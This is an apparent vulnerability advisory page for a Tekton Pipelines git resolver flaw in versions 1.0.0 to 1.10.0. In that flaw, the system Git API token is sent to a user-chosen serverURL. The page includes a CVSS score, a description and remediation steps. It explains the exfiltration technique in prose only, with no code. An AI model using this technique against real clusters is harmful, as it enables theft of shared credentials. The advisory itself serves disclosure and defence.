EUVD-2026-24165
GHSA-wjxp-xrpv-xpff
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionNVD
Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. From 1.0.0 to 1.10.0, the Tekton Pipelines git resolver in API mode sends the system-configured Git API token to a user-controlled serverURL when the user omits the token parameter. A tenant with TaskRun or PipelineRun create permission can exfiltrate the shared API token (GitHub PAT, GitLab token, etc.) by pointing serverURL to an attacker-controlled endpoint.
AnalysisAI
Credential leakage in Tekton Pipelines git resolver allows authenticated users to exfiltrate system-configured Git API tokens (GitHub PAT, GitLab tokens) by directing the resolver to attacker-controlled endpoints. Affects versions 1.0.0 through 1.10.0 when users omit the token parameter in TaskRun or PipelineRun configurations. …
Sign in for full analysis, threat intelligence, and remediation guidance.
RemediationAI
Within 24 hours: Identify all Tekton Pipelines deployments and confirm installed versions (1.0.0-1.10.0 are affected). Within 7 days: (1) Restrict TaskRun and PipelineRun creation privileges to trusted users only via RBAC; (2) audit git resolver configurations for omitted token parameters and enforce explicit token specification; (3) rotate all system-configured Git API tokens. …
Sign in for detailed remediation steps.
Share
External POC / Exploit Code
Leaving vuln.today